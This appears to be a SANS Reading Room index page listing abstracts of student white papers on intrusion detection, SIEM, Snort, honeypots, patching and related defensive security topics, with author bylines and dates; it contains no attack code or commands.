Most of the computer security white papers in the Reading Room have been written by students seeking GIAC certification to fulfill part of their certification requirements and are provided by SANS as a resource to benefit the security community at large. SANS attempts to ensure the accuracy of information, but papers are published "as is". Errors or inconsistencies may exist or may be introduced over time as material becomes dated. If you suspect a serious error, please contact firstname.lastname@example.org.
Now more than ever, IT infrastructures are targeted by malicious outsiders, ranging from ideologically motivated groups such as Anonymous (Norton, 2012) to corporations and governments utilizing highly sophisticated Advanced Persistent Threats (Juels & Yen, 2012).
Intrusion detection is the process of monitoring the events occurring in a computer system or network and analyzing them for signs of possible incidents, which are violations or imminent threats of violation of computer security policies, acceptable use policies, or standard security practices.
By: Javier Jimenez Diaz (posted on December 19, 2011)
Not long ago, analog and purpose built communications systems use to be prevalent
technologies on industrial plants. It wasn’t common to find either interoperability or
compatibility among them. In the 70s communication Networking began to be used in Direct
Digital Control (Berge Jonas, 2004).
By: Ratna Deepika Kannan (posted on September 12, 2011)
With the ubiquitous growth of the Internet, retaining its security is a difficult task. Two decades ago, computer systems were generally not connected to the Internet or were simply a part of a small network.
Amongst various security threats that have evolved lately, Denial of service (DoS) attack is the most destructive according to the security experts. A Denial of Service attack is a method of blocking service from its intended users.
Helix Pharmaceuticals is worried about security. In the cutthroat world of multi-billion dollar pharmaceutical companies, industrial espionage is a significant concern. In addition, political and social activists continually attempt to disrupt business as retribution for perceived injustices.
"OSSEC is an Open Source Host-based Intrusion Detection System. It performs log analysis, file integrity checking, policy monitoring, rootkit detection, real-time alerting and active response" (Trend Micro, 2010).
Software patching for IT Departments across the organizational landscape has always been an integral part of maintaining functional, usable and stable software. Historically the traditional patch cycle has been focused on fixing or resolving issues which affect functionality. In recent years, with the advancement of more sophisticated and targeted threats which are occurring in quicker cycles, this focus is dramatically changing. (Risk Assessment – Cisco, n.d.; Executive Office of The United States, 2005) . Corporations and Government now have a greater understanding of potential losses and expenses incurred by not maintaining application security and are moving towards an increased focus on patching and security (Epstein, Grow & Tschang, 2008). With organizations’ reputations, consumer confidence and corporate secrets at risk, corporations and government are recognizing the need to shift and address vulnerabilities at a much faster pace than they historically have done so (Chan, 2004). Over roughly the last ten years, the length of time between the documentation of a given vulnerability in a piece of software and the development of an actual exploit that can take advantage of the weakness in the application, has decreased tremendously. According to Andrew Jaquith, senior analyst at Yankee Group, the average time between vulnerability discovery and the release of exploit code is less than one week. (“Shrinking time from,” 2006). It has also been identified that “99% of intrusions result from exploitation of known vulnerabilities or configuration errors where countermeasures were available” ("Risk reduction and.," 2010) . Clearly these statistics alone can prove daunting for many businesses trying to keep pace and maintain proper defenses against the bad guys.
In this paper, we examine techniques for identifying signatures and anomalies associated with attacks against the data link layer on both wired and wireless networks. Methods for signature-based detection and anomaly-based detection are not new. Intrusion detection systems such as SNORT are quite capable of detecting some of the known data link layer attacks and include a mechanism for integrating Intrusion Prevention System (IPS) solutions. This paper does not advocate against the use of these solutions in organizations. What we present can augment your existing capabilities by detecting attacks that may be blind to your IDS.
The days of installing a firewall at the “edge” of the network and monitoring traffic from a single point have long vanished into the history books. Today's security “edge” has collapsed all the way to the desktop and traffic from practically every system in the network must be monitored, analyzed, and acted on to maintain a secure posture (Cummings, 2004). This type of intense monitoring requires a combination of intrusion detection systems (IDS), event correlation, and analysis.
Historically, the expression “covert channel” has broadly encompassed all communications that are hidden and communicate stealthily between endpoints. The goal of such a channel is not necessarily to obscure the data flowing through the channel, but to obscure the very fact that a channel exists. Often this data may be passed in plain sight of possible observers, but if properly engineered, may remain nearly impossible to detect. Covert channels represent a pure example of security through obscurity.
With today’s technology there exist many methods to subvert an information system which could compromise the confidentiality, integrity, or availability of the resource. Due to the abstract nature of modern computing, the only way to be reliably alerted of a system compromise is by reviewing the system’s actions at both the host and network layers and then correlating those two layers to develop a thorough view into the system’s actions. In most instances, the computer user often has no indication of the existence of the malicious software and therefore cannot be relied upon to determine if their system is indeed compromised.
Attackers continue to find new methods for penetrating networks and compromising hosts. Therefore, defenders need to look for indications of compromise from as many sources as possible. Collecting and analyzing log data across the enterprise can be a challenging endeavor. However, the wealth of information for intrusion detection analysts is well worth the effort. SIEM solutions can help intrusion detection by collecting all relevant data in a central location and providing customizable altering and reporting. In addition, SIEM solutions can provide significant value by helping to determine whether or not an incident occurred. The challenge for analysts is creating effective alerts in order to catch today’s sophisticated and well funded attackers.
By: Cristian Ruvalcaba (posted on December 28, 2009)
The importance of IDS in corporate defense is seen as an ever growing necessity. Major strides have been made for numerous IDS tools, but some have seen a stalemate. The next evolutionary step in IDS would involve the concept of a 'Smart Intrusion Detection System (IDS)', one that generates signatures. The question of how to generate these signatures becomes instrumental, and can involve a number of different components. In this case, it could involve a tool that uses a hybrid LaBrea concept.
This paper describes the mechanics of a RFI (remote file include) attack by doing a code analysis and an attack walk through on a vulnerable application. Detecting an attack is discussed by writing sample IDS signatures and looking at related log files.
Security Whitepaper: How to create a simple, static inventory database and compare security alerts to see if they relate to the host in question. This will allow for greater visibility into which alerts are actually relevant to the end users network.
Defend against the Conficker worm and other viruses. How it is possible to take individual security updates and, in Siem architecture combine them with other metrics to enhance and tune detection capabilities.
The discipline of network security has as one of its goals the protection of critical
business network traffic. There are a number of preventative methods that can be employed
to ensure that a network is designed well, but attackers will still attempt to exploit weaknesses
to gain access to important business data and systems.
This paper will demonstrate how analysts can begin experimenting with Snort 3.0 today by manually compiling the source code or by simply downloading a preconfigured bootable CD. This paper will also discuss the design of Snort 3.0 and its new features, such as multithreading, native inline bridging, dynamic reconfiguration, and native IPv6 support.
Information systems are more capable today than ever before. Society increasingly relies on computing environments ranging from simple home networks, commonly attached to high speed Internet connections, to the largest enterprise networks spanning the entire globe. Filling one's tax return, shopping online, banking online, or even reading news headlines posted on the Internet are all so convenient. This increased reliance and convenience, coupled with the fact that attacks are concurrently becoming more prevalent has consequently elevated the need to have security controls in place to minimize risk as much as possible.
This paper examines one of the assumptions that form the foundations of packet analysis. A discussion of an approach to analyzing protocol stacks is presented. This approach can be used to determine gaps in the protocol stack where an analyst can be misled.
This paper will describe how to install, use, and deploy Tiny Honeypot (THP), written by George Bakos [Bakos, 2002], and then use the data returned by THP to write custom IDS rules. THP completes the incoming connection, records data received, can return custom responses, and simulate any application layer protocol. Completing the TCP connections allows the IDS to see the data payload instead of just the connection attempt.
Passive Application Mapping (PAM) is a solution for this problem. In this paper I cover the topics that are vital to understanding and utilizing PAM. I also cover the commercial and public efforts that incorporate PAM to better aid in Intrusion Analysis and network maintenance.
This paper describes a framework to help security personnel have a starting point with which to collect and view security events from devices capable of reporting via syslog. Ideally, the reader will be able to follow along and use this paper in a way similar to a how-to reference guide.
This report is intended to provide information of value to security engineers who are choosing among various solutions to protect their Solaris systems from undesirable changes. In particular, the open-source product "Radmind" is described so it may be effectively compared to other, perhaps more well-known, commercial and open-source filesystem integrity applications.
Maintaining a secure network connected to the Internet is becoming more difficult as time goes on. New viruses are released daily, higher machine speeds and more sophisticated and automated tools mean that hackers can scan and attack wide sections of the Internet at a time
The rapid deployment of security patches and anti-virus updates has become a basic need within most IT organizations. The time between the disclosure of a vulnerability and its exploitation continues to decrease while vulnerabilities are becoming easier to exploit and are increasingly severe. Locally enforcing security policy on a large number of computers can be a challenge but keeping remote (VPN or dial-up connected) computers up to date can prove even more difficult.
Computer and network intrusions have been with us since the introduction of the computer, but intrusion detection systems are still somewhat new to the market (first implementations started in the early 90's).
In today's security landscape, Intrusion detection systems have joined firewalls as "must have" tools, but getting the greatest benefit from these devices requires much more than a deploy and move on strategy.
Over the past few years many papers and books have included articles explaining and supporting either Intrusion Detection Systems (IDS) or the newer technology on the security block, Intrusion Prevention Systems (IPS).
This document outlines separating Snort IDS Collection and Analysis Suite duties across a minimum of three servers (Snort sensor, MySQL database and an ACID web server) to gain optimal coverage and performance.
This paper's objective was to examine the role of the Intrusion Detection System (IDS) in modern security strategies, establish a set of criteria for IDS evaluation, investigate the functionality of PureSecureTM, an application developed and marketed by Demarc Security, and present conclusions concerning its desirability as a working IDS.
This paper will introduce a Honey Pot known as the Deception Tool Kit (DTK) written by Fred Cohen. It will give an overview of what the DTK is, where to obtain it, how it works, and offers advice about when it should be deployed.
Although all parts of the backup strategy are equally important, this paper will focus on the backup script and will detail a flexible backup script that uses built-in Solaris software tools which create a reliable local backup of a Solaris machine running Oracle.
The paper is designed to: outline the necessity of the implementation of Intrusion Detection systems in the enterprise environment; clarify the steps that need to be taken in order to efficiently implement your Intrusion Detection System; and, describe the necessary components.
By: Kathleen Buonocore (posted on October 31, 2003)
This paper examines five steps to follow when selecting an intrusion detection system (IDS): identify the need, gain a general understanding of intrusion detection systems, gain a detailed understanding of the network, evaluate various IDS systems, and determine policy and procedures.
This paper focuses on Network ID Systems, and discusses the technical detail behind techniques that can be employed to counteract the utility of these systems and identifies tools that actually use the techniques described.
This paper will examine the intrusion detection systems, one of the relative new technologies in information security. It aims to explore, in high level, the intrusion detection systems available today, as well as new developments in the technology.
The aim of this paper is to examine the origins of detecting, analysing and reporting of malicious activity, where it is today and where it appears to be heading in the future. Some of the many techniques and tools presently used in Network defence will be explored as well.
This paper will look at one system administrator's attempts to contact host owners of machines that scan or probe her network. After a brief discussion of various ways to identify possible contacts, this person's data will be used to show how different sites may respond and how probes have multiplied over a definitive period of time. The paper concludes by mentioning two projects that might help the overburdened system/network/security administrator to simplify the whole process of contacting a host owner.
This paper aims to help BlackICE IDS administrators by identifying and classifying some events frequently seen by IDS agents in two common deployments - on a DMZ web server and on systems within an internal (mainly Microsoft) network.
This paper presents requirements for an Intrusion Detection System (IDS), as well as an analysis of currently available IDS software packages and a recommendation of the best HIDS package to manage a suite of Solaris machines.
This paper describes Intrusion Detection Systems (IDS) and compares the two main categories of detection principles, signature detection and anomaly detection; also described is a new type of anomaly detection based on protocol standards.
By: Thomas Goeldenitz (posted on October 31, 2003)
This paper is not intended to predict the future, but bring to light emerging technologies and trends in the field of IDS that could make the life of the security specialist easier (if there is such a thing).
Choosing the right software for an intrusion detection system can be a challenging task that often requires extensive research. While there are many different products available, Tripwire from Tripwire Inc. and Symantec's Intruder Alert offer two possible solutions for a host-based intrusion detection system.
In my Kickstart paper I covered basic Unix log files with a configuration file that gathered everything. I would like to expand on that and now cover messages found in those log files that would cause concern and require further investigation.
By: Jon-Michael C. Brook (posted on October 31, 2003)
The following discussion centers on the benefits and detractors of rule-based Intrusion Detection Tailoring, and how, overall, it is best to leave tailoring for Network IDS systems to the product vendors.
By: Heather M. Larrieu (posted on October 31, 2003)
This paper outlines the role and issues with the use of the SSH protocol, types and methods of intrusion detection, and proposes techniques and an architecture for an intrusion detection system that uses the SSH daemon as a sensor.
By: Brian K. Sheffler (posted on October 31, 2003)
The purpose of this paper is to inform and educate security professionals about the analytical potential of using a tool or technique that renders visual representations of the data/traffic that traverses a given network. The emphasis is on the design and theory behind such tools. Included are examples of data visualization products that are commercially available.
This paper will focus on intrusion detection systems in general, and specifically on two examples of the most promising new weapon in the battle against Internet hackers and worms: distributed intrusion detection.
The paper discusses the implementation of ManHunt, the pilot version protocol anomaly based NIDS offered by Recourse Technologies that were evaluated against high level functional requirements detailed in the following case study.
This paper documents the procedure that I set up to automate collecting and sending intrusion attempt information to Incidents.org and the Internet Storm Center, then discusses my results and some possible next steps.
A number of dIDS with global scope have been active for several years, and five of these are discussed and compared with each other in terms of focus, data source, notification tools, available agents, statistical reporting tools and linkage to security and vulnerability information.
This paper explores the current state of Intrusion Detection Systems (IDS) technology, identifies system requirements and essential elements in the context of an overall architecture; and it highlights several systems, available today, that fit nicely into the suggested architecture.